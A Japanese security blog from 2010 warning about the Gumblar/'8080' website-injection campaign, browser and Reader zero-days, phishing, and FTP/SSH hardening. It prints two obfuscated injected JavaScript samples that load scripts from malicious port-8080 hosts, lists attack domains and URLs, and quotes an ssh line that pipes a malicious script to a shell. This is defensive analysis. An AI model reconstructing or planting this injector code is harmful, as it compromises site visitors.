UnderForge of Lack

ちょっとイヤ～な感じっぽいので注意喚起です。

Mozilla Firefox Unspecified Code Execution Vulnerability 4
A vulnerability has been reported in Mozilla Firefox, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified error and can be exploited to execute arbitrary code.
The vulnerability is reported in version 3.6. Other versions may also be affected.
え”？

VulnDisco 9.0
People who've seen firefox exploit agree with me - it is a really cool bug, it was an interesting challenge to find and exploit it. The exploit needs some work, but it was quite reliable in our testing.

Attack code for Firefox zero-day goes wild, says researcher

攻撃ベクトルがはっきりしないので、緩和策の提示ができませんが、注意喚起しておきます。

※ど・・どうすりゃいいんでしょう！？
Do not visit untrusted websites or follow untrusted links.
・・・・・・

This must be yet another revision

またか～と頭が痛くなりますね
アンチウィルスソフトに引っかかると、GoogleBlockされる（笑）可能性がありますので、以下の変更を行っています。
( → （
) → ）
/ → ／

try{window.onload=function（）{Iebf2d21q07z = '' + 'i）c（#i$b）!a&$-$（c$（））o&）m（（.@c&）!o&（@n（&s!）（t@!#a）n@!!t（@&（@c^$^#o^#n&t!a&&c!t（.!#（c（&@^o））$^m#&&.@&p@e@）^r&e#@）$z@h#（i!l!#^t（（@o@n!@@^-#$^c）^（o（&m）.#（b^i）$l&$（&!t$o^&!p^&.@&#&r!（u$:@））N#q#@5#（^b!（&@h$3）f&@）i#@t&$w&!1@r$#v!$／!&@$g####o（$@&&o（g$l）@!e@$.@（c$$
（）o&m&.$@（a^u!／^##g））（）o#^o#&#g$#l!^）e$$.&#c!o（$@m（$.!^^a!u）^!／@!t#$@o（（$r（!#r&（&e#^n$t^@^$s!&$^.（@r#!@u）$#&／（a@$l$#l!（e!^g$）（r&$#）o$^&.^p（）l!）^@／#$$##g#$o）@$o）$#^g（&l（e@.#!c&o&@m$#／^
'.replace（／#|@|\^|\$|\!|&|\）|\（／ig, ''） ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement（'sc'+'ript'）;
Rkn5tmljhj1c.src = 'h'+'ttp:／／'+Iebf2d21q07z.replace（／Nq5bh3fitw1rv／g, '8080'）;Rkn5tmljhj1c.setAttribute（'defer', 'def'+'er'）;e val（'document.body.'+Jq2dz9nff1w0lm+'（Rkn5tmljhj1c）'）;} } catch（P052l4jn ） {}

decode:
iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

また、散布ISPにも変動があり、
77.72.25.34 AS44062(TESENE)
83.168.238.66 AS35041(NET-CRYSTONE)
の２者が参戦しています。

どこまで勤勉なんでしょうね・・・

NCSoft Phishing

From: makelelejr@hotmail.com
To: makelelejr@hotmail.com
Subject: Password Reset Success
Date: Thu=2C 28 Jan 2010 10:46:17 +0800

Someone 65.255.34・173 Aion has been reset to your game account password. If you not make the change=2C please contact support hｔｔps://secure.ncsoft.com/login.20

Phishing Site:
hXXp://www.secure-ncsoft-nic.com
216.245.220.121 via LimeStone

Redirection:
hXXp://safe.saouar-ncsoft.com/
67.231.248.13 via ?(謎AS)
route-record : MISSING!
おいおい・・

LimeStoneなので、通報すれば即テイクダウンするでしょうが、ドメインや収容先は当然、変動の恐れがあります。

NCSoft(韓国のネットワークゲーム・ベンダー）のユーザは気をつけましょう。
公式のログイン先は
https://secure.ncsoft.com/loginです。

炎上中の模様：
ttp://www.aionsource.com/forum/aion-discussion/104445-consolidated-phishing-attempt-thread-your-password-has-been-reset-check.html
安全性に自信が持てないので自己責任でお願いします。

注意喚起
約７時間ほど前に、8080系の使用していた ru ドメインのうちの殆どが A レコードを失い、正引き不能になりました。
それと同時に、いくつかのインジェクションが変更された模様です。

こうしたインジェクション攻撃は、定期的にパターンを変更する傾向がありますので注意してください。
※8080系は Symantecの主張するガンブラー™と名づけられた攻撃手法の一つです。

ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
genuinehollywood.ru
genuinecolors.ru
halfsite.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
yourtruemate.ru
※赤い色のドメインが残留、更にドメイン変更の可能性大。

----------
/* */ 消去？
From Hidden Iframes to Obfuscated Scripts -- comment
The script has a new revision already out and being injected into sites. A sample:

＜script＞ try{window.onload=function（）{document.write（'＜div id=megaid＞skysports-com.marketwatch＜/div＞'）;Whglbtpkg9yawk = document.getElementById（'megaid'）.innerHTML + '.）c^o#$$#m@（@.&&（!t&o（&&r##&&r!（$#e#@!n@t!s!）-@（r（u@$^.$$&y）!!o&!u#!!r##!t!&@!o@（$&p!@（&f$@i^l$m）^!@s（.（））r!#（&u!）@:&!&#）D）E）&#&B）（）U^&（@G&@（@/#（^c（（a!m）##）$4#@@.#&^c####&o（#!m）/@^c$&a^）@m（4&#.!@）（^c（$o@m!&!/（g）!!o&&#$o!g&（l&）^^e&#@.&^c#（o^&m!^$/（#m!^^c（&s$s@）l!^$.^&$c（（$o#（@m）（/@!&g@#o&!!$@o$##g$@#l$e&&）.#$c^#o$#!m#&）$.）（#e&&）^g）&/&'.replace（/&|#|\$|\）|\!|\（|\^|@/ig, ''） ;document.write（'＜scr'+'ipt src=http://'+Whglbtpkg9yawk.replace（/DEBUG/g, '8080'）+'＞＜/scr'+'ipt＞'）;} } catch（Xvp1q8pu ） {}＜/script＞
＜!--50e1dd63239a5e1b3900972f2e5de214--＞

という感じで攻撃手法の変更が報告されています。

2010.02.02
一部アンチウィルスソフトにひっかかると（携帯に）連絡があったので、半角括弧を全角に変更しました。

あぁ・・いたちごっこ

----------
あ～あ～
サーバーアプリの脆弱性突かれ、共有サーバー丸ごと改ざん
スタンダード10で提供しておりますfig(フォトアルバム)のセキュリティホールを利用し、不正なプログラムを設置、実行されたことが原因であると思われます。問題が発生した当該プログラムは削除済みです。

2010.01.06 水曜日
これかな（笑）
修正済みかと思ったけど、そうでもなかったらしいですね

----------
その他

iSlateなのか iPadなのか ・・・
明日がたのしみ・・・

６万５千円のディナーショー（CTスキャンつき？）お疲れ様でした（笑）

sophosのvirus info は詳細が無いので役に立たないと思うんですけど・・・

EoF(追記中）

2010.02.01 改修

知り合いから相談を受けたのでちょっと・・・

----------
FTP
File Transfer Protocol（ファイル・トランスファー・プロトコル、略称：FTP）
を知らない人はあまり居ないかもしれませんが、そのセキュア転送に関してはIT企業でも混乱している様子ですので・・・

----------
SFTP
SFTPは SSH File Transfer Protocolの略称で、実はFTPではありません。
例えば、SourceForgeには
Windows用SCP/SFTPクライアント「WinSCP」で安全なファイル転送
最近では、セキュリティ向上のためファイル転送にFTPではなく、SCPやSFTPを推奨しているサイトも多い。
と記述されていますが、ここに大きな陥穽が潜んでいます。

SSHを外部に開くということは、Windows リモートデスクトップを外部に開放するのと同じということを理解していますか？

SFTPは、要するに SSH -- Secure Shellの仕組みを使ったファイル転送であって、旧 rcpコマンドのセキュア版（別名 scp）です。Portは TCP/22を使用します。

逆に言えば、SFTP/SCPを使用したいということになれば、DMZからWANにPort22をピアスすることになり、これはSSH辞書攻撃などに晒されることになります。
もちろん、id_rsa/dsa の鍵＋パスフレーズをきちんと管理し、一般のshell modeを許可しない方法で開けるのであれば、セキュリティ的には問題がないレベルですが、往々にしてそうはなっていません。
※SCPの場合、認証鍵の作成の際に no-pty オプションを使用することにより、端末の割り当てを明示的に禁止することが可能・・・・かも
SSHD (8) -- AUTHORIZED_KEYS ファイルの形式(※注1)

また、SSHログインとFTPログインのユーザ情報(Credential)は同じになってしまうため、一部ユーザのためだけに FTP を許可したりすると、そこから SSHで侵入、完全に制御を奪われてしまうというケースが多々あるものと推測されています。

----------
SCPとSFTP 2010.02.01追記
SCP
　SSH1でシェルコマンドを使用する（しかない）
SFTP
　SSH2のサブシステムとして動作可能
SCPではシェルコマンドを必ず実行しなければならないため実際問題としてはセキュアではないかもしれません。
WinSCPはその名称で SCP しか対応していないと見られがちですが、そうでは無いことを併記しておきます。

参考：
WinSCP : サポートしている転送プロトコル -- 2004.11.03

----------
FTPS (FTP over SSL/TLS) (※TLSは以降省略します)
FTPSは、従来のFTPで送受信するデータを SSLで暗号化するプロトコルで、SSHを使用する SFTP や SCP とは全く別のものです。 制御通信は Port21を使用し、実際のデータ送受信は、複数のポートをランダムに使用する PASVモードが一般的です。

FTPSには更に２つのモードがあります。
Explicit
　サーバ接続時は非SSLで接続し、ハンドシェイクが完了した後SSL通信に移行
Implicit
　最初からクライアントがSSLハンドシェイクを要求する

一見、Implicitのほうがセキュアに思えますが、Implicitの場合は、基本的にサーバ側のプロトコルに完全合致した設定を理解できる FTPS クライアントが必須となります。またTCP/990や989 を使用することもあるため、環境に依存することが多く、大抵すんなりとは動きません。ExplicitでもAUTHハンドシェイク完了後のID/PASS応答はSSLとなるため、どうしてもサーバ情報を秘匿したい場合以外は問題ないと考えています。

尚、PASVでの動作が前提となる場合、PASV用のポートに対してもケアが必要になります（特にNAT越えの場合）
※PORTモード(データ転送 : Port 20) はあまりお奨めしません。

2010.02.01 追記
Explicitモードのことを「明示的なFTPS」と翻訳され、FTPESと表記されることもあります。
Implicitは「暗黙的なFTPS」と翻訳されています。
用語から受ける印象と実際の通信手順に若干のズレがある点に注意してください。
No.6432　explicit, implicitの違い
誤解されているのでしょうか？　implicitは、SSLでセッションを張るための仕組みなのでそれ以外有り得ず、選択の余地がありません。
以前はこの部分がネックとなっていたわけですが、逆説的表現を使えば、Port21を塞いでPort990のみを開け、明確にFTPoverSSLのみしか受け入れないほうが良いと考える向きもあるかもしれません。

----------
結論
いずれにせよ、現在FTP で何も考えずにデータ転送をしている環境が大きく変更されることは間違いありません。しかし、インシデントはたった１回で致命傷になります。

今回のGumblar、ガンブラー™の蔓延は、セキュリティを見直す又とないチャンスです。

これを他山の石とし、社内のセキュリティ・ポリシーを再度見直し、クライアントに対してFTP通信の危険性を説き、Web全体のセキュリティの向上を目指す一助になれば、これに勝る幸いはありません。

参考：
FTP, FTPS, SFTP -- 更新日：2005.05.07
FTPの暗号化の種類
FTPサーバ(vsftpd)の構築(RedHat系編)
Fedora/CentOS - FTPサーバの構築(vsFTPD)

※注1
ssh scp sftp の正しい自動実行方法
via:
_ ssh scp sftp の正しい自動実行方法
あと、これも時々目にする勘違いだけど、「no-pty」は仮想端末とれなくなるだけで、シェルが取れなくなるわけじゃないので、仮想端末取らないで「ssh remotehost '/bin/sh' < 悪のスクリプト」とかやるだけの話。
という感じで、実際にはカナリ頭痛のタネ系の問題が多いことも事実です。

------------------------------------------------------------
追記：
ah様より、
restricted shell for scp/sftpってのぢゃだめ？
と、教えていただきました。

ありがとうございます。

rsshは実は使ったことがなかったので、今回勉強のため VMに入れてみます。
特に chroot が可能なのは初めて知りましたので、うまくいけば FTPSよりも楽かもしれません。
が、
相談してきた人は、IIS だったことに気が付いたのは内緒にしておきます（爆）
※正確には、運用中のサーバの中に 2003/IISのものが混じってる

あと、
企業のセキュリティ・ポリシーとして 22番を外向きに開けるのはどうか？と思うぞ？
という意見も頂きました。
ま・・やっぱりそうですよね・・・

------------------------------------------------------------
rssh homepage(日本語訳)
RSSH.CONF
chrootpath

rssh (実際には補助プログラム)が chroot() システムコールを呼んで、指定されたディレクトリにファイルシステムのルートディレクトリを変更する。例えば、
chrootpath=/usr/chroot
は仮想的なファイルシステムのルートを /usr/chroot に変更し、ファイルシステムの /usr/chroot の下以外にユーザがアクセスできないようにし、 /usr/chroot がルートディレクトリとして見えるようにする。 chroot jail を適切に設定するように注意すること。どのようにしたらよいかのヒントについては、rssh ソースとともに配布される CHROOT ファイルを見ること。また chroot(2) の man ページも参照すること。
もし(/etc/password で指定される)ユーザのホームディレクトリが、このキーワードで示されるパス以下であれば、ユーザはホームディレクトリへと chdir される。そうでなければ、chroot jail の / へと chdir される。

rsshによるセキュアなファイル転送

[IN ZERO DAY]

坂田晴美禁止！
Microsoft Internet Explorerに暗雲が・・・
[979352] Internet Explorer の脆弱性により、リモートでコードが実行される

本日のキーワード：
CVE-2010-0249
Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4; Windows XP SP2 and SP3; Windows Server 2003 SP2; Windows Vista Gold, SP1, and SP2; Windows Server 2008 Gold, SP2, and R2; and Windows 7 allows remote attackers to execute arbitrary code by accessing a pointer associated with a deleted object, as exploited in the wild in January 2010.

Microsoft Releases Security Advisory 979352

流れとしては、Ilion様のとこの解説がわかりやすいでしょう（笑）
インジェクション

Further Details Regarding Attack Against Adobe Corporate Network
ぼ・・ぼくのせいじゃ・・な・・ないんだな・・・

つい昨日まで安閑としていた MS系のセキュブログが・・・

Security Advisory 979352 Released
Internet Explorer 6の悪用事例を確認 (セキュリティ アドバイザリ 979352)
小野寺です。
Internet Explorer 6の脆弱性が悪用されたことを確認し、それに伴い、現在サポートしているすべてのバージョンのInternet Explorerの調査を行っています。

以下各社一斉の報道
Operation “Aurora” Hit Google, Others
Googleへのサイバー攻撃はIEの脆弱性を悪用――McAfeeが調査
More Details on “Operation Aurora”
IE zero day exploit prime suspect in Google attacks
0-day vulnerability in Internet Explorer 6, 7 and 8
Exploit code available for CVE-2010-0249
McAfee: Chinese cyber attacks exploited Internet Explorer
Microsoft says Google was hacked with IE zero-day
Recent attacks on Google exploited previously unknown hole in IE
IE flaw gave attackers entry, says McAfee
Microsoft warns of IE bug used in Chinese attacks on Google
Microsoft Internet Explorer Arbitrary Code Execution 5
McAfee Claims IE, not Adobe Flaw, to Blame
Microsoft Internet Explorer Freed Object Code Execution
Microsoft Internet Explorer において任意のコードが実行される脆弱性
2010年1月15日現在、対策方法はありません。
ワークアラウンドを実施する
対策版が公開されるまでの間、以下の回避策を適用することで、本脆弱性の影響を軽減することが可能です。
・[インターネット] ゾーンのセキュリティ設定を "高" にする
・[インターネット] および [ローカル イントラネット] ゾーンのセキュリティ設定において、[アクティブ スクリプト] の項目を "ダイアログを表示する" もしくは "無効にする" に設定する
・Internet Explorer 6 Service Pack 2 および Internet Explorer 7 にて、DEP (Data Execution Prevention) を有効にする
Internet Explorer6/7/8に脆弱性、マイクロソフトがアドバイザリ公開
MicrosoftがIEの脆弱性を報告　IE 6狙った攻撃も
IEを狙う攻撃への回避策

まぁ、アレだ
IE6なんか焼いてしまったほうが、お互いに平和になると思うんです（笑）

IE7+Vista環境下で本当に攻撃が成功していたのかどうかは今後の評価待ちでしょう。
※個人的にはVistaが動作するPCでIE7を使い続ける意味がよくわかりません。

IExplorer 0day CVE-2010-0249 – Exploit-Comele / Hydraq / Aurora -- extraexploit
yahooo.8866.org (AS4766 KT-NET KORnet)
sl1.homelinux.org
360.homeunix.com
ftp2.homeunix.com
update.ourhobby.com

IE 0day CVE-2010-0249 -- Wh's Behind


----------

おみくじ：末吉

初詣から帰ってきたら puppet様よりメールが入っていて、ごそごそ調査
破魔矢のご利益って、新インジェクションを引き当てることなんでしょう・・・きっと

今度の改竄は「/*CODE1*/」 #コメント：kiyoP様
また改竄に変化が

とりあえず Wepawetに投げ込んでみると・・・
真っ赤っ赤
hXXp://www.m17.cz/loader.php?modul=napoveda

8080系に酷似した複合攻撃分岐ですが、難読化が更に激しくなっています。

----------
脆弱性判断

使用していると見られる脆弱性(1)：
CVE-2008-2463
Office Snapshot Viewer
[MS08-041] Microsoft Access Snapshot Viewer の ActiveX コントロールの脆弱性により、リモートでコードが実行される (955617)

使用している脆弱性(2)：
CVE-2008-0015
[MS09-037] Microsoft ATL (Active Template Library) の脆弱性により、リモートでコードが実行される (973908)

使用している脆弱性(3)：
CVE-2009-0927
いつもの getIcon

使用している脆弱性(4)：PDF取得成功：
hxxp://domoktov.com/bu1/pdf.php?t=4b32085e5ae9e
pdf_php.got 25/40 (62.5%)
CVE-2009-4324
現在、絶賛Zero-Day中の util.printd() VTの結果は良好

使用している脆弱性(5)：
jjj.jar 6/40 (15.00%)
CVE-2008-5353

脆弱性そのものに大きな変化は無いようですが・・・

----------
マルウェア本体

ドロッパーはドロップのみなので、ペイロードに何がセットされているかは、ダウンローダ次第（あるいみロシアンルーレット）
Ikarus : Trojan.Win32.Bredolab
↑サンドボックスを検知して、途中でターミネートしている

VirusTotalの結果：
load.exeXXXX 18/40 (45.00%)
しかし・・Ikarus, TrendMicro, Avastが Bredolab、MicrosoftがWaｌedacと検出とか、どんだけ・・・

しかも、同一のドロッパの別種：
e07992198585149aeaeca080aff8d656 5/40 (12.50%)

----------
国内でも既に・・・

インデックス・ファイルに意図しないコードが挿入されます。-- 2009.12.21
複数のドメインの各ディレクトリに設置してあるindex.html、index.phpのすべてに
意図しないコードが挿入されていました。
また、phpmyadminディレクトリも同様です。

文字数制限のため、外部リンクにいたしました。

コード注意：（テキスト）
http://public.xrea.jp/code.txt

モロこれですね・・

他にも

"document.getElementById(" +"parseInt" +"charCodeAt(" +"replace(" +"window.eval("

あたりで調べると、猫がキーボードの上で暴れたような Function名・変数名の JavaScriptコードが散見されます。

ただ、これ比較的古い攻撃のような印象も受けるのですが、日付も操作されているのかもしれません。

----------
重要なこと

これ、8080 reverse proxyを使ってないんですが・・・（苦笑）
呼び名に困ってしまいました。

----------
厄除け
FAILED
今年もマルウェアから離れられないようです。

P.S.
puppet様のせいではないのです。
が、破魔矢を担いで帰ってきたら、この有様だったので（友人ともども）かなり笑ってしまいました。

今年もよろしくお願いいたします。

EoF

連日の警報ですねぇ（嘆息）

HONDA陥落
Hondaホームページ　「ストリーム」サイトに関する報告とお詫び
ストリームを担当する制作会社のパソコンが、「Gumblar（ガンブラー）」亜種により、コンピュータウィルスに感染し、パソコンの情報が第三者により盗まれ、対象サイトのファイルが改ざんされました。



OMG!

JR東日本に続いて２件目の「大手正規サイト」陥落です。

しかも放置期間が長かったため、事態はきわめて重篤です。

1261064262.dat -- 2ch.net
名無しさん＠そうだドライブへ行こう sage 2009/12/19(土) 00:51:12 ID:BUJ0xUOP0
今公式見ようとしたらカスペが

入力したURLのWebページを表示できません
入力したURL: hXXp://www.honda.co.jp/STREAM/
このWebページはウイルスに感染しています
次のウイルスが見つかりました:Trojan.JS.Agent.awm
この情報が正しくないと考えられるときは、ご利用のサービスプロバイダーにご連絡ください

こんなん出たんだけど俺だけ？

カスペルスキーは 12/13には検出していた模様
Wordpress blog hacked – security issues -- Dec.13
コメント内 12/24
Trojan-Clicker.JS.Iframe.db h t t p ://szn-cz. voila. fr. commentcamarche-net. wintersaleonline. ru: 8080/google. com/google. com/xnxx. com/weather. com/vnet. cn/

同一のものですね。

ペイロード
Trojan-Dropper.Win32.HDrop.aa [Kaspersky Lab]
※MicrosoftはBredlabとして検出

もっとも、いつもおせわになっている さまれぼ 管理人様より
【サイト改竄報告】いよいよ8080系改竄サイト出現！
Kasperskyが無反応だったとの報告も受けていますので、過信は禁物です

WEB/SERVER管理者へ
JR東日本やHONDAのような一流企業が、こんな初歩的な対策を執っていなかったとは俄かに信じ難いものがありますが

・FTP(平文)の全面使用禁止
・(無いとは思いますが)TELNETをポート(23)単位で閉塞
・FTPoSSLでのアクセスは必ず固定IPアドレスのみを受け入れ、その他は DENY ALL する。
・FileZilla使用の場合、パスワードをクライアントに保管しない。
・SSHは基本的には外部開放しない（当たり前ですが！）
・SSHは鍵とパスフレーズを併用し、プロジェクト終了後、個人鍵を破棄する。

このインシデントを起こしてしまったWeb制作会社にはお悔やみ申し上げます。

冗談ではなく、「明日は我が身」くらいの姿勢で臨まないと取り返しの付かないことになりそうです。

参考：
8080 -- FFXI(Ilion様)
※adobeの件は後ほど

CVE-2009-4324の技術的解析（pdf解体)
悪意あるPDF（malicious PDF）に含まれる Exploit コードを pdf-parser.py で確認する -- 思い立ったら書く日記
Let's parse PDF！
outline of interview.pdf
outline of interview.pdf 26/41 (63.41%)
注視部分：
/JS 2
/JavaScript 3

注意！「GNU GPL」「CODE1」Webサイト改竄拡大中
ブラウザのJavaScriptは基本的にOFFにして（それで見れないサイトなんて大抵切り捨てて構わないでしょ？）、心中してもいいサイトだけJavaScriptを許可しましょう。
インシデントを起こしたら全責任は制作会社に降りかかってくるわけですからね～

追記：
Mooterフリー検索
Mooterフリー検索 の検索結果 約 34,900 件中 1 - 10 件目 (0.05 秒)

さて・・どんな対応を取るんでしょうね・・・

----------

Anniversary No.800 が 8080 の Emergency Postでした（笑）

EoF

恐れていた事態が発生しました

Adobeが1/12までゼロデイを放置したおかげさまで、
新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃～今すぐ対策を
8080系(/*GNU GPL*/ /*CODE1*/)が、Adobe (Acrobat) Readerのゼロデイ悪用コードを使用、正真正銘の無防備状態になってしまいました。

とりあえず、Adobe (Acrobat) Readerの使用を中止するか、JavaScriptをオフにしてください。